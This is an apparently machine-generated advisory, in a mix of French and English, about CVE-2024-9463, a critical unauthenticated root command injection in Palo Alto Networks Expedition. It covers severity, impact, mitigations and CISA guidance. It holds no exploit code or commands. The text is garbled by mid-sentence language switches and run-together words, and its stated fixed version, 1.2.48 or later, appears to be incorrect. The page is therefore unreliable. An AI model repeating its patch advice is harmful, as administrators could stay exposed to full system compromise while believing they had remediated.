Aperçu
Palo Alto Networks Expedition contains a critical OS command injection vulnerability caused by improper input validation. This unauthenticated vulnerability allows remote attackers to execute arbitrary OS commands with root privileges. The vulnerability exists in the Expedition application and requires no authentication or user interaction to exploit. La vulnérabilité a été divulguée le October 9, 2024. CISA a identifié CVE-2024-9463 comme étant exploitée mais n'est pas actuellement connue pour être utilisée dans des campagnes de rançongiciel.
Détails techniques
Palo Alto Networks Expedition fails to properly validate and sanitize user input before passing it to OS command execution functions. This improper input validation in a critical code path allows unauthenticated remote attackers to inject arbitrary operating system commands that are executed with root-level privileges. The vulnerability can be triggered through a network request without requiring prior authentication or user interaction.
La vulnérabilité est classifiée comme CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')) etCWE-20 (Improper Input Validation) .
La vulnérabilité a reçu un score de base CVSS v3.1 de 9.8 (CRITICAL) avec la chaîne vectorielle CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, indiquant sa nature critical.
Impact
Successful exploitation allows unauthenticated remote attackers to execute arbitrary operating system commands with root privileges on the affected system. This enables complete system compromise, including data theft, malware installation, lateral movement within the network, and system disruption. The root-level execution context means attackers can access all system resources, modify critical files, install backdoors, and potentially compromise other systems on the network.
Mitigation et contournements
Upgrade Palo Alto Networks Expedition to version 1.2.48 or later. Follow Palo Alto Networks standard upgrade procedures for your Expedition deployment. Ensure proper backup and testing in non-production environments before applying to production systems. Les versions suivantes incluent les correctifs nécessaires : Expedition 1.2.48 and later.
Comme contournements temporaires : implement network-level access controls to restrict access to the expedition application. use firewalls, vpns, or network segmentation to limit exposure to trusted networks and ip addresses only.; disable expedition if it is not currently in use until patching is possible., et monitor expedition logs and system logs for suspicious command execution patterns or unusual process activity..
Recommandation de CISA : Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Ressources additionnelles
Source : Ce rapport a été généré par IA
